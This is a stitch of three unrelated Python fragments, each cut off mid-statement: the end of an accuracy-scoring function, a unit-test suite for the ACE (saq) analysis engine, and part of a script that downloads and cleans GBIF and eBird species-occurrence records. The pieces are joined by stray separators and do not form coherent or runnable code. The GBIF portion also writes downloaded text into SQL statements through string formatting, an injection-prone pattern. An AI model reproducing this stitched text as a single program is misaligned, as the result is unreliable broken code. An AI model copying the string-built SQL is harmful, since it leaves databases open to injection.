assert_number_labels: Optional[int] = None,
ignore_label_differences: bool = True
) -> Union[float, List[float]]:
'''
:param ignore_label_differences: See :py:func:`get_labels`
Accuracy score. Description at top of module explains arguments.
'''
true_values, predicted_values_list = get_labels(target_collection,
true_sentiment_key,
predicted_sentiment_key,
ignore_label_differences=ignore_label_differences)
scores: List[float] = []
for | |
= TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
from saq.modules.test import DelayedAnalysisTestAnalysis
root = create_root_analysis(uuid=root.uuid, storage_dir=storage_dir_from_uuid(root.uuid))
root.load()
analysis = root.get_observable(observable.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertIsNotNone(analysis)
self.assertTrue(analysis.initial_request)
self.assertTrue(analysis.delayed_request)
self.assertEquals(analysis.request_count, 2)
self.assertTrue(analysis.completed)
def test_delayed_analysis_multiple(self):
uuids = []
for i in range(3):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.storage_dir = storage_dir_from_uuid(root.uuid)
root.initialize_storage()
observable = root.add_observable(F_TEST, '0:01|0:05')
root.save()
root.schedule()
uuids.append((root.uuid, observable.id))
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
from saq.modules.test import DelayedAnalysisTestAnalysis
for root_uuid, observable_uuid in uuids:
root = create_root_analysis(uuid=root_uuid, storage_dir=storage_dir_from_uuid(root_uuid))
root.load()
analysis = root.get_observable(observable_uuid).get_analysis(DelayedAnalysisTestAnalysis)
self.assertTrue(analysis.initial_request)
self.assertTrue(analysis.delayed_request)
self.assertEquals(analysis.request_count, 2)
self.assertTrue(analysis.completed)
def test_delayed_analysis_timing(self):
root_1 = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root_1.initialize_storage()
o_1 = root_1.add_observable(F_TEST, '0:04|0:10')
root_1.save()
root_1.schedule()
root_2 = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root_2.initialize_storage()
o_2 = root_2.add_observable(F_TEST, '0:01|0:10')
root_2.save()
root_2.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
from saq.modules.test import DelayedAnalysisTestAnalysis
# the second one should finish before the first one
root_1 = RootAnalysis(uuid=root_1.uuid, storage_dir=root_1.storage_dir)
root_1.load()
analysis_1 = root_1.get_observable(o_1.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertTrue(analysis_1.initial_request)
self.assertTrue(analysis_1.delayed_request)
self.assertEquals(analysis_1.request_count, 2)
self.assertTrue(analysis_1.completed)
root_2 = RootAnalysis(uuid=root_2.uuid, storage_dir=root_2.storage_dir)
root_2.load()
analysis_2 = root_2.get_observable(o_2.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertTrue(analysis_2.initial_request)
self.assertTrue(analysis_2.delayed_request)
self.assertEquals(analysis_2.request_count, 2)
self.assertTrue(analysis_2.completed)
self.assertLess(analysis_2.complete_time, analysis_1.complete_time)
def test_unix_signals(self):
engine = TestEngine()
engine.start()
# tell ACE to reload the configuration and then reload all the workers
os.kill(engine.engine_process.pid, signal.SIGHUP)
wait_for_log_count('reloading engine configuration', 1, 5)
wait_for_log_count('got command to restart workers', 1, 5)
wait_for_log_count('started worker loop', 2)
engine.controlled_stop()
engine.wait()
@track_io
def test_io_count(self):
self.assertEquals(_get_io_write_count(), 0)
self.assertEquals(_get_io_read_count(), 0)
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_single')
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test_1')
root.save()
root.schedule()
self.assertEquals(_get_io_write_count(), 1)
self.assertEquals(_get_io_read_count(), 0)
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_basic_test')
engine.controlled_stop()
engine.start()
engine.wait()
# at this point it should have loaded the root analysis
# and then saved it again along with the details for the BasicTestAnalysis
self.assertEquals(_get_io_write_count(), 3)
self.assertEquals(_get_io_read_count(), 1)
from saq.modules.test import BasicTestAnalysis
root = create_root_analysis(storage_dir=root.storage_dir)
root.load()
self.assertEquals(_get_io_write_count(), 3)
self.assertEquals(_get_io_read_count(), 2)
analysis = root.get_observable(observable.id).get_analysis(BasicTestAnalysis)
self.assertEquals(_get_io_read_count(), 2) # should not have loaded details yet...
self.assertTrue(analysis.test_result)
self.assertEquals(_get_io_read_count(), 3)
@track_io
def test_delayed_analysis_io_count(self):
self.assertEquals(_get_io_write_count(), 0)
self.assertEquals(_get_io_read_count(), 0)
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
observable = root.add_observable(F_TEST, '00:01|00:05')
root.save()
root.schedule()
self.assertEquals(_get_io_write_count(), 1)
self.assertEquals(_get_io_read_count(), 0)
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
# expect 5 writes at this point
# (1) initial root analysis save
# (2) initial module save
# (3) root analysis completed save
# (4) updated module save
# (5) root analysis completed save
self.assertEquals(_get_io_write_count(), 5)
# and then 4 reads (one LOAD for each, iterated twice)
self.assertEquals(_get_io_read_count(), 3)
from saq.modules.test import DelayedAnalysisTestAnalysis
root = create_root_analysis(uuid=root.uuid)
self.assertTrue(root.load())
self.assertEquals(_get_io_write_count(), 5)
self.assertEquals(_get_io_read_count(), 4)
analysis = root.get_observable(observable.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(_get_io_read_count(), 4) # should not have loaded details yet...
self.assertTrue(analysis.delayed_request)
self.assertEquals(_get_io_read_count(), 5)
def test_autorefresh(self):
saq.CONFIG['engine']['auto_refresh_frequency'] = '3'
engine = TestEngine(pool_size_limit=1)
engine.start()
wait_for_log_count('triggered reload of worker modules', 1)
wait_for_log_count('detected death of process', 1)
engine.controlled_stop()
engine.wait()
def test_memory_limit(self):
from saq.database import Workload, Lock
# reduce the limits so the test is easier
saq.CONFIG['global']['memory_limit_warning'] = '128'
saq.CONFIG['global']['memory_limit_kill'] = '256'
root = create_root_analysis()
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test_memory_limit_warning')
root.save()
root.schedule()
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_basic_test')
engine.start()
time.sleep(3)
engine.controlled_stop()
engine.wait()
# we should see a warning message about taking up too much memory
wait_for_log_count('is using too much memory', 1)
# same thing as before except we allocate so much memory we force ace to kill the process
root = create_root_analysis()
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test_memory_limit_kill')
root.save()
root.schedule()
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_basic_test')
engine.start()
time.sleep(3)
engine.controlled_stop()
engine.wait()
# we should see a warning message about taking up too much memory
wait_for_log_count('used too much memory', 1, 10)
# we should NOT see a workload item or a lock left
self.assertEquals(saq.db.query(Workload.id).count(), 0)
self.assertEquals(saq.db.query(Lock.uuid).count(), 0)
def test_final_analysis(self):
"""Test final analysis execution."""
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test')
root.save()
root.schedule()
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_test_final_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
# we should have a single observable now
root = create_root_analysis(uuid=root.uuid)
root.load()
self.assertEquals(len(root.all_observables), 1)
self.assertTrue(root.has_observable(F_TEST, 'test'))
from saq.modules.test import FinalAnalysisTestAnalysis
analysis = root.get_observable(observable.id).get_analysis(FinalAnalysisTestAnalysis)
self.assertIsNotNone(analysis)
# we should have seen this twice since the modification of adding an analysis will triggert
# final analysis again
self.assertEquals(log_count('entering final analysis for '), 2)
@track_io
def test_final_analysis_io_count(self):
self.assertEquals(_get_io_write_count(), 0)
self.assertEquals(_get_io_read_count(), 0)
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test')
root.save()
root.schedule()
self.assertEquals(_get_io_write_count(), 1)
self.assertEquals(_get_io_read_count(), 0)
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_test_final_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
self.assertEquals(_get_io_write_count(), 3)
self.assertEquals(_get_io_read_count(), 1)
self.assertEquals(log_count('entering final analysis for '), 2)
@track_io
def test_final_analysis_io_count_2(self):
"""Same thing as before but we test with multiple observables."""
self.assertEquals(_get_io_write_count(), 0)
self.assertEquals(_get_io_read_count(), 0)
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
observable_1 = root.add_observable(F_TEST, 'test_01')
observable_2 = root.add_observable(F_TEST, 'test_02')
root.save()
root.schedule()
self.assertEquals(_get_io_write_count(), 1)
self.assertEquals(_get_io_read_count(), 0)
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_test_final_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
self.assertEquals(_get_io_write_count(), 4)
self.assertEquals(_get_io_read_count(), 1)
self.assertEquals(log_count('entering final analysis for '), 3)
# ensure that post analysis is executed even if delayed analysis times out
def test_delayed_analysis_timeout(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
test_observable = root.add_observable(F_TEST, '0:01|0:01')
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis_timeout', 'test_groups')
engine.enable_module('analysis_module_test_post_analysis', 'test_groups')
engine.start()
# wait for delayed analysis to time out
wait_for_log_count('has timed out', 1)
engine.controlled_stop()
engine.wait()
# post analysis should have executed
self.assertEquals(log_count('execute_post_analysis called'), 1)
def test_delayed_analysis_recovery(self):
from saq.database import DelayedAnalysis, Workload
# scenario: delayed analysis starts, ace engine stops and then starts back up
# the delayed analysis should pick back up and complete
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.storage_dir = storage_dir_from_uuid(root.uuid)
root.initialize_storage()
observable = root.add_observable(F_TEST, '0:05|0:10')
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
# wait until we see the delay in the queue
wait_for_log_count('queue sizes workload 0 delayed 1', 1)
# now kill the engine
engine.stop()
engine.wait()
# we should have one delayed analysis still in the queue
self.assertEquals(saq.db.query(DelayedAnalysis.id).count(), 1)
# and nothing in the workload queue
self.assertEquals(saq.db.query(Workload.id).count(), 0)
# start another engine back up
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
from saq.modules.test import DelayedAnalysisTestAnalysis
root = create_root_analysis(uuid=root.uuid, storage_dir=storage_dir_from_uuid(root.uuid))
root.load()
analysis = root.get_observable(observable.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertIsNotNone(analysis)
self.assertTrue(analysis.initial_request)
self.assertTrue(analysis.delayed_request)
self.assertEquals(analysis.request_count, 2)
self.assertTrue(analysis.completed)
# queue should be empty
saq.db.close()
self.assertEquals(saq.db.query(DelayedAnalysis.id).count(), 0)
self.assertEquals(saq.db.query(Workload.id).count(), 0)
def test_wait_for_analysis(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_1')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(uuid=root.uuid, storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_B))
self.assertEquals(log_count("depends on"), 1)
def test_wait_for_disabled_analysis(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_1')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
#engine.enable_module('analysis_module_test_wait_b')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_B))
#self.assertEquals(log_count("requested to wait for disabled (or missing) module"), 1)
self.clear_error_reports()
def test_wait_for_analysis_circ_dep(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_2')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_B))
self.assertEquals(log_count("CIRCULAR DEPENDENCY ERROR"), 1)
def test_wait_for_analysis_missing_analysis(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_3')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertFalse(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_B))
# we would only see this log if A waited on B
#self.assertEquals(log_count("did not generate analysis to resolve dep"), 1)
def test_wait_for_analysis_circ_dep_chained(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_4')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.enable_module('analysis_module_test_wait_c', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B, WaitAnalysis_C
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_B))
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_C))
self.assertEquals(log_count("CIRCULAR DEPENDENCY ERROR"), 1)
def test_wait_for_analysis_chained(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_5')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.enable_module('analysis_module_test_wait_c', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B, WaitAnalysis_C
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_B))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_C))
self.assertEquals(log_count("CIRCULAR DEPENDENCY ERROR"), 0)
def test_wait_for_analysis_delayed(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_6')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_B))
def test_wait_for_analysis_rejected(self):
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B, WaitAnalysis_C, \
WaitAnalyzerModule_B
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_engine_032a')
test_observable.exclude_analysis(WaitAnalyzerModule_B)
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.enable_module('analysis_module_test_wait_c', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable | |
dkey = d[0]
except Exception as e:
print(e)
print(download_filters)
# Get the download, if not ready, keep trying
print("Waiting for the Darwin Core Archive.....")
timestamp2 = datetime.now()
gotit = False
while gotit == False:
try:
# Download the file
timestamp = datetime.now()
zipdownload = occurrences.download_get(key=dkey, path=working_directory)
print("Wait time for DWcA creation: "
+ str(datetime.now() - timestamp2))
print("Wait time for DWcA download: "
+ str(datetime.now() - timestamp))
gotit = True
except:
wait = datetime.now() - timestamp2
if wait.seconds > 60*1440:
gotit = True
print("FAILED!!! -- timed out after 24 hrs. ",
"Try again later or split up query with ",
"year paramters")
# Read the relevant files from within the Darwin Core archive
timestamp = datetime.now()
with DwCAReader(zipdownload["path"]) as dwca:
try:
dfRaw = dwca.pd_read('occurrence.txt', low_memory=False)
except Exception as e:
print("Read error:")
print(e)
try:
doi = dwca.metadata.attrib["packageId"]
except Exception as e:
print("DOI error:")
print(e)
try:
citations = dwca.open_included_file('citations.txt').read()
except Exception as e:
citations = "Failed"
print("Citation error:")
print(e)
try:
rights = dwca.open_included_file('rights.txt').read()
except Exception as e:
rights = "Failed"
print("Rights error:")
print(e)
print("Wait time for reading the DwCA: "
+ str(datetime.now() - timestamp))
# Record DWCA metadata
# Store the value summary for the selected fields in a table.
timestamp = datetime.now()
cursor.executescript("""CREATE TABLE GBIF_download_info
(download_key TEXT, doi TEXT, citations TEXT,
rights TEXT);""")
cursor.execute('''INSERT INTO GBIF_download_info (doi, download_key)
VALUES ("{0}", "{1}")'''.format(doi, dkey))
try:
cursor.execute('''UPDATE GBIF_download_info
SET citations = "{0}"
WHERE doi = "{1}"'''.format(citations, doi))
except Exception as e:
print(e)
cursor.execute('''UPDATE GBIF_download_info
SET citations = "Failed"
WHERE doi = "{0}"'''.format(doi))
try:
cursor.execute('''UPDATE GBIF_download_info
SET rights = "{0}"
WHERE doi = "{1}"'''.format(rights, doi))
except Exception as e:
print(e)
cursor.execute('''UPDATE GBIF_download_info
SET rights = "Failed"
WHERE doi = "{0}"'''.format(doi))
print("Stored GBIF Download DOI etc.: "
+ str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SUMMARIZE
timestamp = datetime.now()
# We don't want to count the "UNKNOWNS" we added
if dwca_download == False:
df_raw2 = dfRaw.replace({"UNKNOWN": np.nan})
df_populated1 = pd.DataFrame(df_raw2.count(axis=0).T.iloc[1:])
df_populated1['included(n)'] = df_populated1[0]
df_populated1['populated(n)'] = df_populated1[0]
if dwca_download == True:
df_raw2 = dfRaw.copy()
df_populated1 = pd.DataFrame(df_raw2.count(axis=0).T.iloc[1:])
df_populated1['included(n)'] = len(dfRaw)
df_populated1['populated(n)'] = df_populated1[0]
df_populated2 = df_populated1.filter(items=['included(n)', 'populated(n)'],
axis='columns')
df_populated2.index.name = 'attribute'
df_populated2.to_sql(name='gbif_fields_returned', con=conn,
if_exists='replace')
print("Summarized fields returned: " + str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PREPARE
timestamp = datetime.now()
# Rename columns
records1 = dfRaw.rename({"issue": "issues", "id": "record_id"}, axis=1)
# Drop columns
records1 = records1.filter(items=output_schema.keys(), axis=1)
# Populate columns
records1["retrieval_date"] = str(datetime.now())
if filter_set["get_dwca"] == True:
records1["GBIF_download_doi"] = doi
else:
records1["GBIF_download_doi"] = "bypassed"
records1["source"] = "GBIF"
# Add GBIF records to template; replace and fillna to support astype()
records2 = (pd.DataFrame(columns=output_schema.keys())
.combine_first(records1)
# this replace is needed for API method
.replace({"coordinateUncertaintyInMeters": {"UNKNOWN": np.nan},
"radius_m": {"UNKNOWN": np.nan},
"coordinatePrecision": {"UNKNOWN": np.nan},
"nominal_xy_precision": {"UNKNOWN": np.nan},
"individualCount": {"UNKNOWN": 1},
"weight": {"UNKNOWN": 10},
"detection_distance_m": {"UNKNOWN": 0}})
.fillna({"coordinateUncertaintyInMeters": 0,
"radius_m": 0,
"individualCount": 1,
"weight": 10,
"detection_distance_m": 0,
"effort_distance_m": 0,
"coordinate_precision": 1,
"gps_accuracy_m": 30})
.astype(output_schema))
print("Prepared GBIF records for processing: "
+ str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Results
return records2
def process_records(ebird_data, gbif_data, filter_set, taxon_info,
working_directory, query_name):
'''
Summarizes the values in the data frames, populates some fields,
apply filters, summarize what values persisted after filtering. Insert
results into the output db.
Parameters
----------
ebird_data : a data frame of records from eBird
gbif_data : a data frame of records from GBIF
output_database : path to the output database; string
filter_set : the filter set dictionary
taxon_info : the taxon information dictionary
Returns
-------
filtered_records : a data frame of filtered records.
'''
timestamp = datetime.now()
# Create or connect to the database
output_database = working_directory + query_name + ".sqlite"
conn = sqlite3.connect(output_database, isolation_level='DEFERRED')
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< MANAGE DATA TYPES
schema = output_schema
string_atts = {key:value for (key, value) in schema.items() if schema[key] == 'str'}
if ebird_data is not None:
ebird_data = ebird_data.astype(string_atts)
if gbif_data is not None:
gbif_data = gbif_data.astype(string_atts)
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< REMOVE EBIRD FROM GBIF
if gbif_data is not None:
if ebird_data is not None:
gbif_data = gbif_data[gbif_data["collectionCode"].str.contains("EBIRD*") == False]
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< COMBINE DATA FRAMES
if ebird_data is None:
df_unfiltered = gbif_data
if gbif_data is None:
df_unfiltered = ebird_data
if gbif_data is not None and ebird_data is not None:
# Concatenate the gbif and ebird tables
df_unfiltered = pd.concat([ebird_data, gbif_data])
print("Prepared data frames for processing: "
+ str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SUMMARIZE VALUES
timestamp = datetime.now()
# Make a list of columns to summarize values from
do_not_summarize = ['decimalLatitude', 'decimalLongitude',
'GBIF_download_doi', 'coordinateUncertaintyInMeters',
'detection_distance_m', 'eventDate', 'eventRemarks',
'filter_set_name', 'footprintSRS', 'footprintWKT',
'gbif_id', 'ebird_id', "effort_distance_m",
'general_remarks', 'georeferencedBy', 'habitat',
'georeferenceRemarks', 'identificationQualifier',
'identifiedBy', 'identifiedRemarks', 'individualCount',
'informationWitheld', 'locality',
'locationAccordingTo', 'locationRemarks', "modified",
'occurrenceRemarks', 'radius_m', 'record_id',
'recordedBy', 'retrieval_date', 'taxonConceptID',
'verbatimLocality', 'weight', 'weight_notes']
# Make a function to do the summarizing
def summarize_values(dataframe, step):
"""
Loops through columns and gets a count of unique values. Packages in
a df.
"""
attributes = []
summarize = [x for x in dataframe.columns if x not in do_not_summarize]
for column in summarize:
value_count = dataframe['record_id'].groupby(dataframe[column]).count()
value_df = (pd.DataFrame(value_count)
.reset_index()
.rename({'record_id': step, column: 'value'}, axis=1))
value_df["attribute"] = column
value_df = value_df[["attribute", "value", step]]
if value_df.empty == False:
attributes.append(value_df)
result = pd.concat(attributes)
return result
# Store value summary in a data frame
acquired = summarize_values(dataframe=df_unfiltered, step='acquired')
# Summarize sources
source_df1 = df_unfiltered[['institutionID', 'collectionCode',
'datasetName', 'record_id']]
source_summary1 = (source_df1
.groupby(by=['institutionID', 'collectionCode',
'datasetName'])
.size()
.reset_index(name='acquired'))
print("Summarized values acquired: " + str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< POPULATE SOME COLUMNS
timestamp = datetime.now()
df_unfiltered.fillna(value={'individualCount': int(1)}, inplace=True)
df_unfiltered["weight"] = 10
df_unfiltered["weight_notes"] = ""
df_unfiltered["taxon_id"] = taxon_info["ID"]
df_unfiltered["gbif_id"] = taxon_info["GBIF_ID"]
df_unfiltered["ebird_id"] = taxon_info["EBIRD_ID"]
df_unfiltered["detection_distance_m"] = taxon_info["detection_distance_m"]
df_unfiltered["filter_set_name"] = filter_set["name"]
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< COORDINATE PRECISION
'''In WGS84, coordinate precision is limited by longitude and varies across
latitudes and number of digits provided. Thus, coordinates have a nominal
precision that may limit values. Populate a column for this...'''
# Trim decimal length to 5 digits (lat and long).
# Anything more is false precision.
df_unfiltered["decimalLatitude"] = df_unfiltered["decimalLatitude"].apply(lambda x: coord_rounded(x, 5))
df_unfiltered["decimalLongitude"] = df_unfiltered["decimalLongitude"].apply(lambda x: coord_rounded(x, 5))
# Drop rows without a valid latitude or longitude
df_unfiltered.dropna(subset=["decimalLatitude", "decimalLongitude"],
inplace=True)
# Calculate the number of digits for latitude and longitude
df_unfiltered['digits_latitude'] = [len(x.split(".")[1]) for x in df_unfiltered['decimalLatitude']]
df_unfiltered['digits_longitude'] = [len(x.split(".")[1]) for x in df_unfiltered['decimalLongitude']]
# Estimate longitude precisions
df_unfiltered = nominal_x_precision(dataframe=df_unfiltered,
lat_column="decimalLatitude",
digits_column="digits_longitude",
output_column="nominal_x_precision")
# Latitude precision; lookup for latitude precision
digitsY = {1: 11112.0, 2: 1111.2, 3: 111.1, 4: 11.1, 5: 1.1}
df_unfiltered["nominal_y_precision"] = df_unfiltered["digits_latitude"].apply(lambda x: digitsY[x])
# Put the larger of the two nominal precisions in a column
df_unfiltered["nominal_xy_precision"] = np.where(df_unfiltered["nominal_y_precision"] > df_unfiltered["nominal_x_precision"], df_unfiltered["nominal_y_precision"], df_unfiltered["nominal_x_precision"])
# Clean up
df_unfiltered.drop(["temp", "temp2", "digits_latitude", "digits_longitude",
"nominal_x_precision", "nominal_y_precision"], axis=1,
inplace=True)
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< BUFFER RADIUS
'''
Calculate a buffer distance from various parameters for the
point-radius method. Compilation has to differ with data source and
whether the user chose to use a default coordinate uncertainty. Components
of radius may include coordinateUncertaintyInMeters, coordinatePrecision,
GPS_accuracy_m, effort_distance_m, detection_distance_m.
Records are broken apart by source (GBIF, GBIF/EOD, EBD), processed,
and then concatenated in order to account for all conditions.
If footprintWKT is provided, it will be used by spatial_output instead
of point buffering.
'''
# Records from GBIF with coordinate uncertainty (georeferenced)
georef = df_unfiltered[df_unfiltered["coordinateUncertaintyInMeters"] > 0.0].copy()
if georef.empty == False:
#georef.fillna({"coordinatePrecision": 0.00001}, inplace=True)
georef["gps_accuracy_m"] = np.where(georef["eventDate"].apply(lambda x: datetime.strptime(x, "%Y-%m-%dT%H:%M:%S").year) < 2000, 100, 30)
georef["radius_m"] = georef["coordinateUncertaintyInMeters"]
print("Number of georeferenced GBIF records: " + str(len(georef)))
# Records from GBIF without coordinate uncertainty
gbif_nogeo = df_unfiltered[(df_unfiltered["coordinateUncertaintyInMeters"] == 0.0) & (df_unfiltered["collectionCode"].str.contains("EBIRD*") == False)].copy()
if gbif_nogeo.empty == False:
gbif_nogeo["gps_accuracy_m"] = np.where(gbif_nogeo["eventDate"].apply(lambda x: datetime.strptime(x, "%Y-%m-%dT%H:%M:%S").year) < 2000, 100, 30)
if filter_set["default_coordUncertainty"] is not None:
print("Applying default coordinate uncertainties for GBIF records")
#gbif_nogeo.fillna({"coordinatePrecision": 0.00001}, inplace=True)
